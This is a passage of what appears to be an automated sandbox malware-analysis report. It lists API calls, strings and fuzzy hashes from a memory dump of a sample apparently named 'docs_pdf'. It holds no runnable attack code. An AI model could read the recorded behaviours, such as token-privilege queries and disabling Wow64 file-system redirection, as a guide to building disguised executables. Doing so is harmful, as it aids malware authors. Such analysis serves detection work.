                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01008612
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01008621
                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01008628
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0100863E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: e9ace506ba9372b176e1e0facb80ff7e8fb0032c12bfa5551f73d27d468ceec6
                                    • Instruction ID: f5ebe36b58560af4c9cd7c5f5a5acc5aa3e5e4e92c49f6e36b9aa914974d0f9d
                                    • Opcode Fuzzy Hash: e9ace506ba9372b176e1e0facb80ff7e8fb0032c12bfa5551f73d27d468ceec6
                                    • Instruction Fuzzy Hash: 2CF06831601205AFF7211FA9DC8DE6B3FACFF4A654F004456F585C6190C775D845DB61
                                    APIs
                                     • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 01008669
                                     • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 01008673
                                     • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 01008682
                                     • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 01008689
                                     • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 0100869F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    • API String ID: 44706859-0
                                    • Opcode ID: cee6d02a6a790566077d38be34d7cf6dbdeda368868dfd54a8ebcc0a665a950b
                                    • Instruction ID: cc555853614287d1bf658c3affe6439b1ca88487f5e893e7ae13c0f453cb0569
                                    • Opcode Fuzzy Hash: cee6d02a6a790566077d38be34d7cf6dbdeda368868dfd54a8ebcc0a665a950b
                                    • Instruction Fuzzy Hash: 6FF0AF70600205AFEB221EA9EC88E673FACFF8A654F100016F985D2180CA66D804DF62
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 0100C6BA
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0100C6D1
                                    • MessageBeep.USER32(00000000), ref: 0100C6E9
                                    • KillTimer.USER32(?,0000040A), ref: 0100C705
                                    • EndDialog.USER32(?,00000001), ref: 0100C71F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    • API String ID: 3741023627-0
                                    • Opcode ID: 71ed48e2c07f0b7ebab526b0989a2834e150d22d76b04b260bd79b33dac009a8
                                    • Instruction ID: 38ff2bf1b554b6155d4a0016f97fb14fd02eebec5e2225459e6f671cb0de4250
                                    • Opcode Fuzzy Hash: 71ed48e2c07f0b7ebab526b0989a2834e150d22d76b04b260bd79b33dac009a8
                                    • Instruction Fuzzy Hash: 0101843080070597FB325B24DD4EB967BBCBB04701F000699B6C6A10D1DBE565548B41
                                    APIs
                                    • EndPath.GDI32(?), ref: 00FB13BF
                                    • StrokeAndFillPath.GDI32(?,?,00FEBAD8,00000000,?), ref: 00FB13DB
                                    • SelectObject.GDI32(?,00000000), ref: 00FB13EE
                                    • DeleteObject.GDI32 ref: 00FB1401
                                    • StrokePath.GDI32(?), ref: 00FB141C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    • API String ID: 2625713937-0
                                    • Opcode ID: 02687ee020c66cc52e48a5d87cf63e1549e1f10c4d2b9ed52477f33217f759eb
                                    • Instruction ID: b8452d88eb1c5653944af342b31842a95dcfd8d024d3f5b824caeb6adccb9808
                                    • Opcode Fuzzy Hash: 02687ee020c66cc52e48a5d87cf63e1549e1f10c4d2b9ed52477f33217f759eb
                                    • Instruction Fuzzy Hash: 8CF03171800B09DBEB715F5AE94C7943FA8B701326F48C314F4AA540E9C73B45A5DF11
                                    APIs
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 00FB7BB1: _memmove.LIBCMT ref: 00FB7C0B
                                    • __swprintf.LIBCMT ref: 00FC302D
                                    Strings
                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00FC2EC6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                    • API String ID: 1943609520-557222456
                                    • Opcode ID: fd8484628b2880313ca159d02c88d7ee22bd4aea78ab0e108b3b8a7530eb218d
                                    • Instruction ID: 97b784d5d6aebd8091766bd12b9b6c03de9db6ce8e8a44a5234c16d9881f8a89
                                    • Opcode Fuzzy Hash: fd8484628b2880313ca159d02c88d7ee22bd4aea78ab0e108b3b8a7530eb218d
                                    • Instruction Fuzzy Hash: 04919D725083069FC714FF24DD86DAEB7A8EF84750F04491DF5429B2A1EA38EE44EB52
                                    APIs
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                    • CoInitialize.OLE32(00000000), ref: 0101BC26
                                    • CoCreateInstance.OLE32(01042D6C,00000000,00000001,01042BDC,?), ref: 0101BC3F
                                    • CoUninitialize.OLE32 ref: 0101BC5C
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                    • String ID: .lnk
                                    • API String ID: 2126378814-24824748
                                    • Opcode ID: 40f4e35fdb3cc577d3b5adff8b81919ce5274a17ce59ca739c3d642bcf1fe4d9
                                    • Instruction ID: 1097950326b601d0d55698acd57f8e26b57566146d00c216c8ae95a9e1f13026
                                    • Opcode Fuzzy Hash: 40f4e35fdb3cc577d3b5adff8b81919ce5274a17ce59ca739c3d642bcf1fe4d9
                                    • Instruction Fuzzy Hash: 7FA133756043019FCB14EF15C884D6ABBF5FF88314F048988F9999B2A2CB39ED45CB92
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 00FD52DD
                                      • Part of subcall function 00FE0340: __87except.LIBCMT ref: 00FE037B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__87except__start
                                    • String ID: pow
                                    • API String ID: 2905807303-2276729525
                                    • Opcode ID: 6556bb8e2e4092db24481b8b8e5cad42ecc5837cbec59caa277a04974c248793
                                    • Instruction ID: a92370bfe3fbef5d7ef7dd582a28a26122e4e104b2ff2b1913cfe085a39ce65d
                                    • Opcode Fuzzy Hash: 6556bb8e2e4092db24481b8b8e5cad42ecc5837cbec59caa277a04974c248793
                                    • Instruction Fuzzy Hash: 0E517B72E0864197DB20B715CA4137E3B929B40B61F284D5AE0D5823D9EFB98CC8BB46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #$+
                                    • API String ID: 0-2552117581
                                    • Opcode ID: bbd46a6cfd70ab66b3ab032062414b478035a56bd54173e772c8c2b014e25456
                                    • Instruction ID: 1412fca842c7798d6c8ba8ac2419deee2d7fa4d68fc4f4687769e311ee00cdcc
                                    • Opcode Fuzzy Hash: bbd46a6cfd70ab66b3ab032062414b478035a56bd54173e772c8c2b014e25456
                                    • Instruction Fuzzy Hash: 6B5103355042469FEF26AF28C8887FA7BA5EF59310F184097E9D19B2E0DB349842DF61
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memset$_memmove
                                    • String ID: ERCP
                                    • API String ID: 2532777613-1384759551
                                    • Opcode ID: 9804956ea06e224944a8ff21e523b1f8805bb201f1ef6e9dee737c7d8d937983
                                    • Instruction ID: 60553a99978fa7553b3d579140396c7a95d41cfbe6c3452762c6400fc0649133
                                    • Opcode Fuzzy Hash: 9804956ea06e224944a8ff21e523b1f8805bb201f1ef6e9dee737c7d8d937983
                                    • Instruction Fuzzy Hash: C051A17190470ADBDB28CF65C986BAABBF9EF04314F10856EE58AC7281E731D584DB40
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0103F910,00000000,?,?,?,?), ref: 01037C4E
                                    • GetWindowLongW.USER32 ref: 01037C6B
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01037C7B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 92a0a6f1da8657b6e62bdcc184d717fba486bb9d839646dbdeab694a2238aa4f
                                    • Instruction ID: 92fd0ed115ec02993225b6a943562458fc4f91d0534b3ee5756b68e49b624c3a
                                    • Opcode Fuzzy Hash: 92a0a6f1da8657b6e62bdcc184d717fba486bb9d839646dbdeab694a2238aa4f
                                    • Instruction Fuzzy Hash: FC31D27161020AAFDB618E38DC41BDA7BEDFB85324F244729F9B5931E0D735E8509B50
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 010376D0
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 010376E4
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 01037708
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: cb6a52547966e5727eae70c80e815eb11df19477545414a101e22dc789e79d32
                                    • Instruction ID: 6b4e19c7bb824a27c26fcfdfa3e4a28593381972b119aeaf59085fa1f1fe2381
                                    • Opcode Fuzzy Hash: cb6a52547966e5727eae70c80e815eb11df19477545414a101e22dc789e79d32
                                    • Instruction Fuzzy Hash: 9921D372500219BBDF22CE64CC45FEA3BA9FF8C714F110254FE956B1D1D6B5A850DBA0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01036FAA
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01036FBA
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01036FDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: e9dbf0f6237d980ae0a675f3ec8467f0afd922bd0fae682b9657c6362efc10c2
                                    • Instruction ID: 662b3b464bcc9c40df82d01e5ce4607e4903fed4b1f040ffe03dde3558b78ef1
                                    • Opcode Fuzzy Hash: e9dbf0f6237d980ae0a675f3ec8467f0afd922bd0fae682b9657c6362efc10c2
                                    • Instruction Fuzzy Hash: 4021C5326101187FDF128F58CC84FAB3BAEEFC9754F418164F9849B191CA729C51CBA0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 010379E1
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 010379F6
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01037A03
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 8c85575bcede69a1f7fbe43d49f919399a92607e698291707b63dd61099b3d7e
                                    • Instruction ID: d8bcc1f4ac6fb07b2b34052a262a9048fb87ebcaa3355a2b134c699ecb098822
                                    • Opcode Fuzzy Hash: 8c85575bcede69a1f7fbe43d49f919399a92607e698291707b63dd61099b3d7e
                                    • Instruction Fuzzy Hash: A411E3B2640208BAEF219E75CC05FEB7BADEFC9764F010619FA81A6091D272D411DB60
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FB4C2E), ref: 00FB4CA3
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00FB4CB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: c897fa85a009de81fad3150b0474216441bcdfccb53c6e3b0356715b8fb47d77
                                    • Instruction ID: b438dc0903090401ed0c5c951ae88887e4154538914dc013ac8bd55046b6914b
                                    • Opcode Fuzzy Hash: c897fa85a009de81fad3150b0474216441bcdfccb53c6e3b0356715b8fb47d77
                                    • Instruction Fuzzy Hash: 51D012B4D11727DFD7205F32DA1864676D9AF06A51B11882DD8C5D6510D774D880CB51
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FB4CE1,?), ref: 00FB4DA2
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FB4DB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 3d4364fb88a9842bc0fe1fc75e351c0e9fa56470d3054450edd1d6e912673cfb
                                    • Instruction ID: ab10c25b3819e617b335375aa10dc58ca6270daed0b78e2e6b31e024d0fb2dfc
                                    • Opcode Fuzzy Hash: 3d4364fb88a9842bc0fe1fc75e351c0e9fa56470d3054450edd1d6e912673cfb
                                    • Instruction Fuzzy Hash: 18D01275D50713CFD7305F32D518A8676D8AF0A255B11882DD8D5D6510D774D880CB51
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00FB4D2E,?,00FB4F4F,?,010762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FB4D6F
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FB4D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: a4fc7f6e0803cfc0a7a0617353289db2b883a00e0f5ca5cdb3e47c05d9355c4a
                                    • Instruction ID: 6f7305ced58d22cbb743c64d3079c325383b59e1abb8f1cee5cee63f8b27235e
                                    • Opcode Fuzzy Hash: a4fc7f6e0803cfc0a7a0617353289db2b883a00e0f5ca5cdb3e47c05d9355c4a
                                    • Instruction Fuzzy Hash: 4BD01770D10713CFDB309F32E91865676ECAF1A262B11892EA4C6DA210E7B5E880CF61
                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,010312C1), ref: 01031080
                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 01031092
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                    • API String ID: 2574300362-4033151799
                                    • Opcode ID: 51dfce8998aafd4bccbca0cb96832daae808509f4b580c244d7dbc3677ece218
                                    • Instruction ID: de4ce96b980ada73d3ff550442789bba9b3e41eb20f7458a1d74ac51f6121126
                                    • Opcode Fuzzy Hash: 51dfce8998aafd4bccbca0cb96832daae808509f4b580c244d7dbc3677ece218
                                    • Instruction Fuzzy Hash: 5FD01270A107138FD7305F35D418517B6ECAF4A251B118C6DA4C5DA110D7B4C480C751
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,01029009,?,0103F910), ref: 01029403
                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01029415
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetModuleHandleExW$kernel32.dll
                                    • API String ID: 2574300362-199464113
